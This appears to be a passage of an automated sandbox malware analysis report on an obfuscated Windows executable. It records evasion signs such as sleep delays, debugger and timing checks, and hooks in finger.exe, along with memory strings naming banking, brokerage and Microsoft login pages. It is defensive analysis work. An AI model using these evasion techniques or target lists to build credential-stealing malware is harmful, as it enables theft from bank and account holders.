                Source: 0.2.72STaC6BmljfbIQ.exe.3876790.0.raw.unpack, pKRJMwkXsnMSxTKDdp.csHigh entropy of concatenated method names: 'hReX09hp7P', 'k9OXTAWEmZ', 'igSXSwOTVX', 'ec6XkBRIab', 'FieXVFdKNq', 'ksLX8nP2SI', 'RTiXelMvPH', 'ax1XZqOng7', 'vWPX33Y1MP', 'zWJXh83dx3'
                Source: 0.2.72STaC6BmljfbIQ.exe.3876790.0.raw.unpack, qhlc1N651c0ElR5oPx.csHigh entropy of concatenated method names: 'Dispose', 'qmIcLGCZJN', 'l3enPrAwi9', 'n6dFkbbMYW', 'sEvcpLCYfv', 'vcuczq0UWK', 'ProcessDialogKey', 'T1Mn5uwOAw', 'NKhncjoHlc', 'FKanni16C7'
                Source: 0.2.72STaC6BmljfbIQ.exe.3876790.0.raw.unpack, MuwOAwLCKhjoHlcNKa.csHigh entropy of concatenated method names: 'JlT3Ujk7Mo', 'SC93PvfnaA', 'qr83oe7E13', 'PCv3FkDtCd', 'LWk390VHnh', 'PWW3W5e2aD', 'DlR3dI6Q3v', 'aIG3Mj2Tts', 'lP33CRQ7pc', 'LjK3tImA0S'
                Source: 0.2.72STaC6BmljfbIQ.exe.3876790.0.raw.unpack, w3Te7Dcc7MwODQ04enk.csHigh entropy of concatenated method names: 'PUXhpIrus3', 'Bd5hzTY0ru', 'DLdg52OeSD', 'zYBgcKO1wq', 'u9ignmPhqX', 'H8FgQUapo6', 'UaGgbDvg8y', 'iNDgHcmm0U', 'hr7gDN3YDI', 'SIyg6ThSXi'
                Source: 0.2.72STaC6BmljfbIQ.exe.3876790.0.raw.unpack, qtiBundPawNHSalhW2.csHigh entropy of concatenated method names: 'n752DyBGk7', 'V6j2XmpEKW', 'g6O2BtUN7G', 'KLEBpZ6BLl', 'g9qBzV55mR', 'LBC25BKg6K', 'x9c2cKcSla', 'CqK2neGtiw', 'Bda2QGGrFZ', 'jlZ2b8tWin'
                Source: 0.2.72STaC6BmljfbIQ.exe.3876790.0.raw.unpack, on2TCxOmW3jD4iDjjp.csHigh entropy of concatenated method names: 'Lp4VtTP69g', 'ycBVlFOg4U', 'xevVOVScDG', 'OfkVR7gvrT', 'Oq9VPBXSN1', 'YUyVo32kIx', 'B9gVF1jZHZ', 'xWuV96qtV6', 'mMXVWycomA', 'GSsVdnVStF'
                Source: 0.2.72STaC6BmljfbIQ.exe.3876790.0.raw.unpack, kCCXgwGjv0mm7961kk.csHigh entropy of concatenated method names: 'ToString', 'g9487do8os', 'Qid8PGfR8g', 'maB8owBEFl', 'YYU8FyCyjC', 'V3I89JhnQV', 'z338W2hiTx', 'co08dyISD2', 't1N8MCcnKn', 'o0r8CdiDKV'
                Source: 0.2.72STaC6BmljfbIQ.exe.3876790.0.raw.unpack, zd6KU5nfqgVavGpF4Z.csHigh entropy of concatenated method names: 'j6DmlfraK', 'Vbs0RTxRq', 'GT6TkhOsq', 'frKikwVrB', 'KZBkUkOvr', 'WQdNOLonJ', 'Kwn4E45516od5d7NjN', 't1aVIfvTNt4pJ6ZLwY', 'vIsZYtV3E', 'wLKhdnjkp'
                Source: 0.2.72STaC6BmljfbIQ.exe.3876790.0.raw.unpack, jMqr1Icno4BB0MDsBQc.csHigh entropy of concatenated method names: 'ToString', 'GkhgSpx0uI', 'fklgkyrteZ', 'sjigN8yXHu', 'A2QgUGyTZV', 'mXPgPhEetv', 'fRYgoMgDGe', 'r6cgFkZt1j', 'LlEJuGsfL3aG8cbT5ct', 'rFyN35sO4gTRcoKAagq'
                Source: 0.2.72STaC6BmljfbIQ.exe.3876790.0.raw.unpack, d8p59esdy6IQbESTR1.csHigh entropy of concatenated method names: 'h8kQHqTjjq', 'G1BQDPT926', 'HELQ6YGk5J', 'E8qQXvE2VL', 'ANHQqhdaSw', 'couQBaKfMR', 'HLIQ2Xfvfj', 'erlQs67idK', 'huKQwV8iqt', 'ggsQaReg7P'
                Source: 0.2.72STaC6BmljfbIQ.exe.3876790.0.raw.unpack, sLn1Cu4uUJ39ktYOMo.csHigh entropy of concatenated method names: 'vpMvSV5Etx', 'nuQvkh8HTp', 'p6IvUhJEPp', 'yhHvPPEh19', 'WQmvF5D58w', 'aJAv9ko9qC', 'UODvd1GtYZ', 'SghvM24A9I', 'jMFvtXScxW', 'Y7Yv7P0Pvy'
                Source: 0.2.72STaC6BmljfbIQ.exe.3876790.0.raw.unpack, q16xCxJg7AHBBpFGKk.csHigh entropy of concatenated method names: 'DPDeKbRBSk', 'd6depddOIm', 'JAxZ54w81B', 'kX1ZcDxQPs', 'N3xe7cJGey', 'rBcelu8Q2l', 'XjTe46Iapt', 'kq2eO59avf', 'MQbeRQypsi', 'naMeG1jL46'
                Source: 0.2.72STaC6BmljfbIQ.exe.3876790.0.raw.unpack, sfWslJzpiB0JjtAbmY.csHigh entropy of concatenated method names: 'VuhhTa9050', 'CulhSPSko2', 'xOUhkRLXvt', 'eNGhUoJftd', 'zmXhPTlvv3', 'W9jhFRkjOx', 'fh5h9pVTfX', 'Ba2huGGtjy', 'hBlhrRC4JC', 'Vhphj1uats'
                Source: 0.2.72STaC6BmljfbIQ.exe.3876790.0.raw.unpack, X53SwUCf5q8ZCfnaOD.csHigh entropy of concatenated method names: 'nVR2rOtAhh', 'X5w2jPBXvj', 'Lv42mL2g5q', 'i1B208Ztpk', 'ncB2IBLs9y', 'UUL2TOCfyL', 'C3r2iNcHGU', 'RAy2SJLONd', 'J9e2kGm6jP', 'hiY2NpX26L'
                Source: 0.2.72STaC6BmljfbIQ.exe.3876790.0.raw.unpack, JLeJ0DSZTD8q7YdFNQ.csHigh entropy of concatenated method names: 'ah86OZbijB', 'c5f6Rxu7EP', 'D6G6GoqM92', 'grN6AbRw6E', 'OY861UDfAx', 'cJJ6J88ji0', 'qJ66xB2c8Z', 'VqN6KcyZWt', 'Q456LcJmcs', 'UVg6p5TMK9'
                Source: 0.2.72STaC6BmljfbIQ.exe.3876790.0.raw.unpack, K9lTQBcbL6AyPbFQ9Ep.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'iZoE3L0eps', 'f8jEhAgJcF', 'sE9Eg9OSkQ', 'BJFEEErAlT', 'HPUEfmgh7h', 'mj8EYQLOiR', 'XVKEuUmiEJ'
                Source: 0.2.72STaC6BmljfbIQ.exe.3876790.0.raw.unpack, BhHjVOUpevcu2oDXFF.csHigh entropy of concatenated method names: 'nteBHwMekf', 'ETuB6f7ymS', 'MiHBqoDD27', 'rqkB2h2QbU', 'NwTBsbxds9', 'Wo0q10wqBw', 'pIcqJcJiuA', 'jEwqx9T44U', 'NcgqKewvMo', 'cHFqLwkGgd'
                Source: 0.2.72STaC6BmljfbIQ.exe.3876790.0.raw.unpack, afpmVvxIwemIGCZJNh.csHigh entropy of concatenated method names: 'Koq3VKwhVl', 'MxX3eTfx4I', 'zZF33fHib2', 'CSx3gBfxqE', 'C393faaGk2', 'S0I3uFM0xG', 'Dispose', 'cOCZDVRha7', 'PIKZ6iJ8Fd', 'mNuZXjmkHt'
                Source: 0.2.72STaC6BmljfbIQ.exe.3876790.0.raw.unpack, JbjQluFxDtdQj9nADe.csHigh entropy of concatenated method names: 'DsGBu8x7iJ', 'kECBrgb0NE', 'k6lBmAYR09', 'xMXB0qVQOq', 'NfLBTjXy3n', 'jWTBijlE7T', 'XFbBkgc6Q7', 'j1fBNSV8u5', 'bHETYlFN4UYVZEsCdeJ', 'gwk7IcFZ5Q22HLi0mxW'
                Source: 0.2.72STaC6BmljfbIQ.exe.6cb0000.4.raw.unpack, vnhkB9c5LWBYTUEP1mo.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'arHh7j6dI3', 'qVvhl4WDsT', 'SCih4RHlv6', 't1vhOvGXRe', 'ku4hR4uQXq', 'lRDhGiiJY7', 'b5lhAAYhWE'
                Source: 0.2.72STaC6BmljfbIQ.exe.6cb0000.4.raw.unpack, bi4fTib2k6j6UQHQKR.csHigh entropy of concatenated method names: 'LP9c2LeJ0D', 'rTDcs8q7Yd', 'kXscanMSxT', 'WDdcypJVij', 'LU8cV7JIhH', 'yVOc8pevcu', 'x12eJr68TYLjoEqxrb', 'AbBirVkG0BZXZHxhyj', 'BKQccIZZSh', 'MwvcQJPsOP'
                Source: 0.2.72STaC6BmljfbIQ.exe.6cb0000.4.raw.unpack, pKRJMwkXsnMSxTKDdp.csHigh entropy of concatenated method names: 'hReX09hp7P', 'k9OXTAWEmZ', 'igSXSwOTVX', 'ec6XkBRIab', 'FieXVFdKNq', 'ksLX8nP2SI', 'RTiXelMvPH', 'ax1XZqOng7', 'vWPX33Y1MP', 'zWJXh83dx3'
                Source: 0.2.72STaC6BmljfbIQ.exe.6cb0000.4.raw.unpack, qhlc1N651c0ElR5oPx.csHigh entropy of concatenated method names: 'Dispose', 'qmIcLGCZJN', 'l3enPrAwi9', 'n6dFkbbMYW', 'sEvcpLCYfv', 'vcuczq0UWK', 'ProcessDialogKey', 'T1Mn5uwOAw', 'NKhncjoHlc', 'FKanni16C7'
                Source: 0.2.72STaC6BmljfbIQ.exe.6cb0000.4.raw.unpack, MuwOAwLCKhjoHlcNKa.csHigh entropy of concatenated method names: 'JlT3Ujk7Mo', 'SC93PvfnaA', 'qr83oe7E13', 'PCv3FkDtCd', 'LWk390VHnh', 'PWW3W5e2aD', 'DlR3dI6Q3v', 'aIG3Mj2Tts', 'lP33CRQ7pc', 'LjK3tImA0S'
                Source: 0.2.72STaC6BmljfbIQ.exe.6cb0000.4.raw.unpack, w3Te7Dcc7MwODQ04enk.csHigh entropy of concatenated method names: 'PUXhpIrus3', 'Bd5hzTY0ru', 'DLdg52OeSD', 'zYBgcKO1wq', 'u9ignmPhqX', 'H8FgQUapo6', 'UaGgbDvg8y', 'iNDgHcmm0U', 'hr7gDN3YDI', 'SIyg6ThSXi'
                Source: 0.2.72STaC6BmljfbIQ.exe.6cb0000.4.raw.unpack, qtiBundPawNHSalhW2.csHigh entropy of concatenated method names: 'n752DyBGk7', 'V6j2XmpEKW', 'g6O2BtUN7G', 'KLEBpZ6BLl', 'g9qBzV55mR', 'LBC25BKg6K', 'x9c2cKcSla', 'CqK2neGtiw', 'Bda2QGGrFZ', 'jlZ2b8tWin'
                Source: 0.2.72STaC6BmljfbIQ.exe.6cb0000.4.raw.unpack, on2TCxOmW3jD4iDjjp.csHigh entropy of concatenated method names: 'Lp4VtTP69g', 'ycBVlFOg4U', 'xevVOVScDG', 'OfkVR7gvrT', 'Oq9VPBXSN1', 'YUyVo32kIx', 'B9gVF1jZHZ', 'xWuV96qtV6', 'mMXVWycomA', 'GSsVdnVStF'
                Source: 0.2.72STaC6BmljfbIQ.exe.6cb0000.4.raw.unpack, kCCXgwGjv0mm7961kk.csHigh entropy of concatenated method names: 'ToString', 'g9487do8os', 'Qid8PGfR8g', 'maB8owBEFl', 'YYU8FyCyjC', 'V3I89JhnQV', 'z338W2hiTx', 'co08dyISD2', 't1N8MCcnKn', 'o0r8CdiDKV'
                Source: 0.2.72STaC6BmljfbIQ.exe.6cb0000.4.raw.unpack, zd6KU5nfqgVavGpF4Z.csHigh entropy of concatenated method names: 'j6DmlfraK', 'Vbs0RTxRq', 'GT6TkhOsq', 'frKikwVrB', 'KZBkUkOvr', 'WQdNOLonJ', 'Kwn4E45516od5d7NjN', 't1aVIfvTNt4pJ6ZLwY', 'vIsZYtV3E', 'wLKhdnjkp'
                Source: 0.2.72STaC6BmljfbIQ.exe.6cb0000.4.raw.unpack, jMqr1Icno4BB0MDsBQc.csHigh entropy of concatenated method names: 'ToString', 'GkhgSpx0uI', 'fklgkyrteZ', 'sjigN8yXHu', 'A2QgUGyTZV', 'mXPgPhEetv', 'fRYgoMgDGe', 'r6cgFkZt1j', 'LlEJuGsfL3aG8cbT5ct', 'rFyN35sO4gTRcoKAagq'
                Source: 0.2.72STaC6BmljfbIQ.exe.6cb0000.4.raw.unpack, d8p59esdy6IQbESTR1.csHigh entropy of concatenated method names: 'h8kQHqTjjq', 'G1BQDPT926', 'HELQ6YGk5J', 'E8qQXvE2VL', 'ANHQqhdaSw', 'couQBaKfMR', 'HLIQ2Xfvfj', 'erlQs67idK', 'huKQwV8iqt', 'ggsQaReg7P'
                Source: 0.2.72STaC6BmljfbIQ.exe.6cb0000.4.raw.unpack, sLn1Cu4uUJ39ktYOMo.csHigh entropy of concatenated method names: 'vpMvSV5Etx', 'nuQvkh8HTp', 'p6IvUhJEPp', 'yhHvPPEh19', 'WQmvF5D58w', 'aJAv9ko9qC', 'UODvd1GtYZ', 'SghvM24A9I', 'jMFvtXScxW', 'Y7Yv7P0Pvy'
                Source: 0.2.72STaC6BmljfbIQ.exe.6cb0000.4.raw.unpack, q16xCxJg7AHBBpFGKk.csHigh entropy of concatenated method names: 'DPDeKbRBSk', 'd6depddOIm', 'JAxZ54w81B', 'kX1ZcDxQPs', 'N3xe7cJGey', 'rBcelu8Q2l', 'XjTe46Iapt', 'kq2eO59avf', 'MQbeRQypsi', 'naMeG1jL46'
                Source: 0.2.72STaC6BmljfbIQ.exe.6cb0000.4.raw.unpack, sfWslJzpiB0JjtAbmY.csHigh entropy of concatenated method names: 'VuhhTa9050', 'CulhSPSko2', 'xOUhkRLXvt', 'eNGhUoJftd', 'zmXhPTlvv3', 'W9jhFRkjOx', 'fh5h9pVTfX', 'Ba2huGGtjy', 'hBlhrRC4JC', 'Vhphj1uats'
                Source: 0.2.72STaC6BmljfbIQ.exe.6cb0000.4.raw.unpack, X53SwUCf5q8ZCfnaOD.csHigh entropy of concatenated method names: 'nVR2rOtAhh', 'X5w2jPBXvj', 'Lv42mL2g5q', 'i1B208Ztpk', 'ncB2IBLs9y', 'UUL2TOCfyL', 'C3r2iNcHGU', 'RAy2SJLONd', 'J9e2kGm6jP', 'hiY2NpX26L'
                Source: 0.2.72STaC6BmljfbIQ.exe.6cb0000.4.raw.unpack, JLeJ0DSZTD8q7YdFNQ.csHigh entropy of concatenated method names: 'ah86OZbijB', 'c5f6Rxu7EP', 'D6G6GoqM92', 'grN6AbRw6E', 'OY861UDfAx', 'cJJ6J88ji0', 'qJ66xB2c8Z', 'VqN6KcyZWt', 'Q456LcJmcs', 'UVg6p5TMK9'
                Source: 0.2.72STaC6BmljfbIQ.exe.6cb0000.4.raw.unpack, K9lTQBcbL6AyPbFQ9Ep.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'iZoE3L0eps', 'f8jEhAgJcF', 'sE9Eg9OSkQ', 'BJFEEErAlT', 'HPUEfmgh7h', 'mj8EYQLOiR', 'XVKEuUmiEJ'
                Source: 0.2.72STaC6BmljfbIQ.exe.6cb0000.4.raw.unpack, BhHjVOUpevcu2oDXFF.csHigh entropy of concatenated method names: 'nteBHwMekf', 'ETuB6f7ymS', 'MiHBqoDD27', 'rqkB2h2QbU', 'NwTBsbxds9', 'Wo0q10wqBw', 'pIcqJcJiuA', 'jEwqx9T44U', 'NcgqKewvMo', 'cHFqLwkGgd'
                Source: 0.2.72STaC6BmljfbIQ.exe.6cb0000.4.raw.unpack, afpmVvxIwemIGCZJNh.csHigh entropy of concatenated method names: 'Koq3VKwhVl', 'MxX3eTfx4I', 'zZF33fHib2', 'CSx3gBfxqE', 'C393faaGk2', 'S0I3uFM0xG', 'Dispose', 'cOCZDVRha7', 'PIKZ6iJ8Fd', 'mNuZXjmkHt'
                Source: 0.2.72STaC6BmljfbIQ.exe.6cb0000.4.raw.unpack, JbjQluFxDtdQj9nADe.csHigh entropy of concatenated method names: 'DsGBu8x7iJ', 'kECBrgb0NE', 'k6lBmAYR09', 'xMXB0qVQOq', 'NfLBTjXy3n', 'jWTBijlE7T', 'XFbBkgc6Q7', 'j1fBNSV8u5', 'bHETYlFN4UYVZEsCdeJ', 'gwk7IcFZ5Q22HLi0mxW'
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Source: Yara matchFile source: Process Memory Space: 72STaC6BmljfbIQ.exe PID: 7760, type: MEMORYSTR
                Source: C:\Windows\SysWOW64\finger.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD324
                Source: C:\Windows\SysWOW64\finger.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD7E4
                Source: C:\Windows\SysWOW64\finger.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD944
                Source: C:\Windows\SysWOW64\finger.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD504
                Source: C:\Windows\SysWOW64\finger.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD544
                Source: C:\Windows\SysWOW64\finger.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD1E4
                Source: C:\Windows\SysWOW64\finger.exeAPI/Special instruction interceptor: Address: 7FFBCB7B0154
                Source: C:\Windows\SysWOW64\finger.exeAPI/Special instruction interceptor: Address: 7FFBCB7ADA44
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeMemory allocated: 25C0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeMemory allocated: 27A0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeMemory allocated: 25C0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeMemory allocated: 7690000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeMemory allocated: 6EA0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeMemory allocated: 8690000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeMemory allocated: 9690000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011C096E rdtsc 6_2_011C096E
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeAPI coverage: 0.7 %
                Source: C:\Windows\SysWOW64\finger.exeAPI coverage: 2.6 %
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exe TID: 7780Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\finger.exe TID: 6408Thread sleep count: 36 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\finger.exe TID: 6408Thread sleep time: -72000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\QOsGpgIPKAjdqPaEBSlKNDiVTLIwCImJoGybGTbSHwPOvCQcuQhrMxoTUvTx\PWhloTdOLAusO.exe TID: 3016Thread sleep time: -45000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\QOsGpgIPKAjdqPaEBSlKNDiVTLIwCImJoGybGTbSHwPOvCQcuQhrMxoTUvTx\PWhloTdOLAusO.exe TID: 3016Thread sleep time: -31500s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\finger.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_0060C7B0 FindFirstFileW,FindNextFileW,FindClose,8_2_0060C7B0
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: 40F193-3PQ.8.drBinary or memory string: ms.portal.azure.comVMware20,11696494690
                Source: 40F193-3PQ.8.drBinary or memory string: discord.comVMware20,11696494690f
                Source: 40F193-3PQ.8.drBinary or memory string: AMC password management pageVMware20,11696494690
                Source: 40F193-3PQ.8.drBinary or memory string: outlook.office.comVMware20,11696494690s
                Source: 40F193-3PQ.8.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
                Source: 40F193-3PQ.8.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
                Source: 40F193-3PQ.8.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
                Source: finger.exe, 00000008.00000002.3274267140.0000000007AE2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696494690/
                Source: 40F193-3PQ.8.drBinary or memory string: interactivebrokers.comVMware20,11696494690
                Source: 40F193-3PQ.8.drBinary or memory string: netportal.hdfcbank.comVMware20,11696494690
                Source: 40F193-3PQ.8.drBinary or memory string: interactivebrokers.co.inVMware20,11696494690d
                Source: 40F193-3PQ.8.drBinary or memory string: account.microsoft.com/profileVMware20,11696494690u
                Source: 40F193-3PQ.8.drBinary or memory string: outlook.office365.comVMware20,11696494690t
                Source: 40F193-3PQ.8.drBinary or memory string: www.interactivebrokers.comVMware20,11696494690}
                Source: 40F193-3PQ.8.drBinary or memory string: microsoft.visualstudio.comVMware20,11696494690x
                Source: 40F193-3PQ.8.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
                Source: 40F193-3PQ.8.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696494690
                Source: finger.exe, 00000008.00000002.3269614249.0000000002B5E000.00000004.00000020.00020000.00000000.sdmp, PWhloTdOLAusO.exe, 0000000B.00000002.3269957179.000000000066F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: 40F193-3PQ.8.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
                Source: 40F193-3PQ.8.drBinary or memory string: trackpan.utiitsl.comVMware20,11696494690h
                Source: 40F193-3PQ.8.drBinary or memory string: tasks.office.comVMware20,11696494690o
                Source: 40F193-3PQ.8.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
                Source: 40F193-3PQ.8.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
                Source: 40F193-3PQ.8.drBinary or memory string: dev.azure.comVMware20,11696494690j
                Source: 40F193-3PQ.8.drBinary or memory string: global block list test formVMware20,11696494690
                Source: firefox.exe, 0000000D.00000002.2226961412.0000017A8743C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll99 VP
                Source: 40F193-3PQ.8.drBinary or memory string: turbotax.intuit.comVMware20,11696494690t
                Source: 40F193-3PQ.8.drBinary or memory string: bankofamerica.comVMware20,11696494690x
                Source: 40F193-3PQ.8.drBinary or memory string: Canara Transaction PasswordVMware20,11696494690}
                Source: 40F193-3PQ.8.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690
                Source: 40F193-3PQ.8.drBinary or memory string: Interactive Brokers - HKVMware20,11696494690]
                Source: 40F193-3PQ.8.drBinary or memory string: Canara Transaction PasswordVMware20,11696494690x
                Source: 40F193-3PQ.8.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
                Source: 40F193-3PQ.8.drBinary or memory string: secure.bankofamerica.comVMware20,11696494690|UE
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011C096E rdtsc 6_2_011C096E
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_00417813 LdrLoadDll,6_2_00417813
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_0122E10E mov eax, dword ptr fs:[00000030h]6_2_0122E10E
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_0122E10E mov ecx, dword ptr fs:[00000030h]6_2_0122E10E
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_0122E10E mov eax, dword ptr fs:[00000030h]6_2_0122E10E
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_0122E10E mov eax, dword ptr fs:[00000030h]6_2_0122E10E
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_0122E10E mov ecx, dword ptr fs:[00000030h]6_2_0122E10E
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_0122E10E mov eax, dword ptr fs:[00000030h]6_2_0122E10E
